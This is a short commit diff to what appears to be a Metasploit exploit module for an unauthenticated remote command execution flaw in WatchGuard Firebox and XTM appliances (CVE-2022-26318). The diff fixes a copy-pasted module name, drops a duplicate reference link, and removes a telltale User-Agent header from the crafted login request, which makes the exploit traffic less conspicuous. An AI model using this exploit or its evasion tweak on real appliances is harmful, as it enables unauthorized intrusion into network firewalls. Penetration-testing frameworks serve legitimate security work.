third release module

h00die-gr3y · h00die-gr3y · commit 66e7f3c5825a · 2024-03-07T21:22:14.000Z
diff --git a/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb b/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
@@ -14,7 +14,7 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Geutebruck instantrec Remote Command Execution',
+        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',
         'Description' => %q{
           This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox
           and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary
@@ -33,8 +33,7 @@ def initialize(info = {})
           [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],
           [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],
           [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],
-          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ],
-          [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2022-26318' ]
+          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]
         ],
         'License' => MSF_LICENSE,
         'Platform' => [ 'unix' ],
@@ -128,7 +127,6 @@ def create_bof_payload
   def create_final_payload
     http_payload = "POST /agent/login HTTP/1.1\r\n"
     http_payload << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
-    http_payload << "User-Agent: CVE-2022-26318\r\n"
     http_payload << "Accept-Encoding: gzip, deflate\r\n"
     http_payload << "Accept: */*\r\n"
     http_payload << "Connection: close\r\n"
